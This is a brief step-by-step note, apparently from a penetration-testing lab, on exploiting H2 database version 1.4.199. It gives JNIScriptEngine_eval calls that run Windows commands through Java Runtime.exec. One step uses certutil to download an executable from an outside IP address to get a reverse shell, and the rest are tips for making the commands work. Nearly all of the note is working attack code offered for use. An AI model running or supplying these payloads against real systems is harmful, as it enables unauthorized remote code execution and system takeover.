Only for H2.1.4.199

1. Follow instructions in exploit 49384.
2. To gain access to more command use cmd /c dir (replacing dir with command you want).
3. Full example:
   CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("cmd /c dir").getInputStream()).useDelimiter("\Z").next()');
4. Can then use certutil to grab reverse shell. (must run WITHOUT cmd /c):
   CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("certutil -f -urlcache http://192.168.49.155/pg80_64.exe pg80.exe").getInputStream()).useDelimiter("\Z").next()');
5. In summary just try with or without cmd /c, also use double slash (\\) for directory. Sometimes file put in C:\Windows\Temp\ cannot be located using dir. Just try to run anyway.